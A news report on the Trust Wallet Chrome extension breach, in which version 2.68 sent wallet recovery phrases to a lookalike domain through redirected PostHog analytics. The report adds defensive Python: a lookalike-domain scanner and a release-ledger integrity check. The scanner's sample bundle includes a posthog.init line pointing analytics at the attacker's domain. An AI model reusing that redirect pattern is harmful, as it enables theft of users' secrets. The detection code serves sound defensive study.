Trust Wallet Chrome Extension Breach Causes $7 Million Crypto Loss via Malicious Code
Trust Wallet is urging users to immediately update its Google Chrome extension to the latest release after identifying a “security incident” that resulted in the theft of roughly $7 million in assets.
The problem, according to the multi‑chain, non‑custodial cryptocurrency wallet provider, affects version 2.68. The extension has around one million users based on the Chrome Web Store listing. Users should upgrade to version 2.69 without delay.
“We’ve confirmed that approximately $7M has been impacted and we will ensure all affected users are refunded,” Trust Wallet said in a post on X. “Supporting affected users is our top priority, and we are actively finalizing the process to refund the impacted users.”
Trust Wallet is also instructing users not to engage with any messages that are not from its verified, official communication channels. Mobile-only users and all other versions of the browser extension are currently assessed as not impacted.
According to technical details shared by SlowMist, version 2.68 included malicious logic designed to enumerate every wallet stored in the extension and initiate a mnemonic phrase prompt for each one.
“The encrypted mnemonic is then decrypted using the password or passkeyPassword entered during wallet unlock,” the blockchain security firm said. “Once decrypted, the mnemonic phrase is sent to the attacker’s server api.metrics-trustwallet[.]com.”
The domain “metrics-trustwallet[.]com” was registered on December 8, 2025, with initial activity to “api.metrics-trustwallet[.]com” starting on December 21, 2025.
Subsequent analysis indicates that the attacker abused posthog-js, an open-source product-analytics library, to collect and exfiltrate wallet user data.
The assets drained so far include about $3 million in Bitcoin, $431 in Solana, and over $3 million in Ethereum. The stolen value has been routed through centralized exchanges and cross-chain bridges to obfuscate origin and perform swaps. Based on an update from blockchain investigator ZachXBT, the compromise has impacted hundreds of individual wallets.
“While ~$2.8 million of the stolen funds remain in the hacker’s wallets (Bitcoin/EVM/Solana), the bulk – >$4M in cryptos – has been sent to CEXs [centralized exchanges]: ~$3.3 million to ChangeNOW, ~$340,000 to FixedFloat, and ~$447,000 to KuCoin,” PeckShield said.
“This backdoor incident originated from malicious source code modification within the internal Trust Wallet extension codebase (analytics logic), rather than an injected compromised third‑party dependency (e.g., malicious npm package),” SlowMist said.
“The attacker directly tampered with the application’s own code, then leveraged the legitimate PostHog analytics library as the data‑exfiltration channel, redirecting analytic traffic to an attacker‑controlled server.”
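The exfiltration pattern SlowMist describes, legitimate analytics code whose traffic is pointed at a lookalike domain, is something a reviewer can check for in an unpacked extension before it is installed or released. The Python scanner below is an added example, not code from Trust Wallet, SlowMist or PostHog: it pulls every absolute URL out of an unpacked extension's files, flags hosts that are neither on an allowlist nor under the brand's own registrable domain, treats hosts that contain the brand name but sit under a different registrable domain as high-severity lookalikes, and separately reports any `api_host` passed to `posthog.init()` that is not a PostHog endpoint. The allowlist, the sample manifest and the bundle snippet are constructed for the example; only the `api.metrics-trustwallet.com` domain comes from the article.

```python
import json
import re
from urllib.parse import urlparse

# Hosts the extension's analytics are expected to reach. Constructed allowlist
# for this example; a real one is taken from the project's release documentation.
ALLOWED_HOSTS = {"us.i.posthog.com", "eu.i.posthog.com", "app.posthog.com"}

URL_RE = re.compile(r"""https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'"`)]*)?""")
# posthog.init('<project key>', { ...options... }) and the api_host option inside it
POSTHOG_INIT_RE = re.compile(r"posthog\.init\(\s*['\"][^'\"]+['\"]\s*,\s*(\{.*?\})", re.S)
API_HOST_RE = re.compile(r"api_host\s*:\s*['\"]([^'\"]+)['\"]")


def registered_domain(host):
    """Naive registrable domain (last two labels); no public-suffix list here."""
    return ".".join(host.split(".")[-2:])


def extract_hosts(text):
    """Hostnames of every absolute http(s) URL found in the text."""
    hosts = set()
    for m in URL_RE.finditer(text):
        host = urlparse(m.group(0)).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def find_posthog_api_hosts(js):
    """api_host values handed to posthog.init() in a JavaScript bundle."""
    found = []
    for m in POSTHOG_INIT_RE.finditer(js):
        opt = API_HOST_RE.search(m.group(1))
        if opt:
            host = urlparse(opt.group(1)).hostname
            if host:
                found.append(host.lower())
    return found


def scan_extension(files, allowed_hosts=ALLOWED_HOSTS, brand="trustwallet.com"):
    """files: {path: text} of an unpacked extension.
    Returns (severity, path, host, reason) findings for hosts that are neither
    allowlisted nor under the brand's own registrable domain."""
    findings = []
    brand_label = brand.split(".")[0]
    for path, text in files.items():
        for host in sorted(extract_hosts(text)):
            if host in allowed_hosts or registered_domain(host) == brand:
                continue
            if brand_label in host:
                findings.append(("high", path, host, f"lookalike of {brand} on a different registrable domain"))
            else:
                findings.append(("medium", path, host, "host not in allowlist"))
        if path.endswith(".js"):
            for host in find_posthog_api_hosts(text):
                if host not in allowed_hosts:
                    findings.append(("high", path, host, "posthog api_host redirected away from PostHog"))
    return findings


# Constructed sample of an unpacked extension; the lookalike domain is the one
# named in the article, everything else (name, key, paths) is made up.
SAMPLE_FILES = {
    "manifest.json": json.dumps({
        "manifest_version": 3,
        "name": "Example Wallet",
        "version": "2.68",
        "host_permissions": ["https://api.metrics-trustwallet.com/*", "https://*.posthog.com/*"],
    }),
    "background.js": (
        "import posthog from 'posthog-js';\n"
        "posthog.init('phc_placeholder', { api_host: 'https://api.metrics-trustwallet.com', autocapture: false });\n"
        "fetch('https://trustwallet.com/changelog');\n"
    ),
}

if __name__ == "__main__":
    for sev, path, host, why in scan_extension(SAMPLE_FILES):
        print(f"[{sev}] {path}: {host} ({why})")
```

The lookalike rule is deliberately blunt: any host carrying the brand name outside the brand's registrable domain is reported, so a legitimate third-party host such as a vendor-hosted support desk would also surface and has to be added to the allowlist explicitly. Running the scan in CI against the built bundle, rather than only on the source tree, is what catches a change made in the packaged code.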
The company added that this may be the work of a nation-state actor and hypothesized that the adversary may have gained control of Trust Wallet‑associated developer endpoints or obtained deployment permissions sometime before December 8, 2025.
Changpeng Zhao, a co-founder of crypto exchange Binance, which owns Trust Wallet, suggested that the exploit was “most likely” carried out by an insider, although no corroborating evidence has been made public to support this assessment.
Update
Trust Wallet, in a follow-up communication, has asked affected users to submit a form via their support desk at “trustwallet-support.freshdesk[.]com” to initiate the compensation workflow. Victims are requested to provide a contact email address, country of residence, compromised wallet address(es), the destination address where funds were drained, and the related transaction hashes.
“We are seeing scams via Telegram ads, fake ‘compensation’ forms, impersonated support accounts, and DMs,” the company warned. “Always verify links, never share your recovery phrase, and use official Trust Wallet channels only.”
Eowyn Chen, Trust Wallet’s CEO, said an investigation into the intrusion is ongoing, reiterating that the impact is limited to Chrome browser extension version 2.68 for users who logged in on or before December 26, 2025, 11 a.m. UTC.
“The malicious extension v2.68 was NOT released through our internal manual process,” Chen said. “Our current findings suggest it was most likely published externally through the Chrome Web Store API key, bypassing our standard release checks.”
“The hacker used a leaked Chrome Web Store API key to submit the malicious extension version v2.68. This successfully passed the Chrome Web Store’s review and was released on December 24, 2025, at 12:32 p.m. UTC.”
After detecting the compromise, Chen said the company suspended the malicious domain, revoked all release APIs, and began processing reimbursements for confirmed victims.
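Chen's account, a version submitted with a leaked Web Store API key that never passed through the internal release process, points to a second control: an independent check that what the store serves is exactly what the team built. The Python below is an added example, not Trust Wallet's release tooling. It computes a content digest over an extension package that does not depend on zip ordering or timestamps, and compares the package served by the store against a ledger of versions and digests recorded by the team's own build job. A version absent from the ledger, such as a 2.68 nobody built, is reported as `unknown_version`; a known version whose contents differ is reported as `tampered`. The packages and the ledger are constructed in memory; how the ledger itself is protected (signing it, keeping its credentials separate from the publishing key) is assumed and outside the snippet.

```python
import hashlib
import io
import json
import zipfile


def package_digest(zip_bytes):
    """SHA-256 over (path, length, bytes) of every entry in sorted order, so the
    digest depends only on the files shipped, not on zip metadata or ordering."""
    h = hashlib.sha256()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in sorted(zf.namelist()):
            data = zf.read(name)
            h.update(name.encode() + b"\0" + len(data).to_bytes(8, "big") + data)
    return h.hexdigest()


def package_version(zip_bytes):
    """Version string declared in the package's manifest.json."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return json.loads(zf.read("manifest.json"))["version"]


def check_store_package(zip_bytes, ledger):
    """ledger: {version: digest} written by the team's own build.
    Returns (status, version); status is "ok", "tampered" or "unknown_version"."""
    version = package_version(zip_bytes)
    expected = ledger.get(version)
    if expected is None:
        return ("unknown_version", version)
    if package_digest(zip_bytes) != expected:
        return ("tampered", version)
    return ("ok", version)


def build_package(files):
    """Constructed helper: zip a {path: text} mapping in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, content in files.items():
            zf.writestr(path, content)
    return buf.getvalue()


# Constructed packages. The legitimate 2.67 is what the team built and recorded;
# the other two stand in for what a store monitor might fetch afterwards.
FILES_267 = {
    "manifest.json": json.dumps({"manifest_version": 3, "name": "Example Wallet", "version": "2.67"}),
    "background.js": "posthog.init('phc_placeholder', { api_host: 'https://us.i.posthog.com' });\n",
}
GOOD_267 = build_package(FILES_267)
RELEASE_LEDGER = {"2.67": package_digest(GOOD_267)}

# Same version string, different bundle: a re-upload of 2.67 with changed code.
MODIFIED_267 = build_package({
    **FILES_267,
    "background.js": "posthog.init('phc_placeholder', { api_host: 'https://api.metrics-trustwallet.com' });\n",
})
# A version number the team never built.
ROGUE_268 = build_package({
    **FILES_267,
    "manifest.json": json.dumps({"manifest_version": 3, "name": "Example Wallet", "version": "2.68"}),
})

if __name__ == "__main__":
    for label, pkg in [("good 2.67", GOOD_267), ("modified 2.67", MODIFIED_267), ("rogue 2.68", ROGUE_268)]:
        print(label, "->", check_store_package(pkg, RELEASE_LEDGER))
```

The check is only as strong as the ledger's isolation: if the same credential that can publish to the store can also append to the ledger, an attacker holding that credential rewrites both. Recording digests from a build system the publishing key cannot reach, and polling the store listing for new versions, turns an unexpected release into an alert rather than a surprise.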
(The story was updated after publication to incorporate the latest findings.)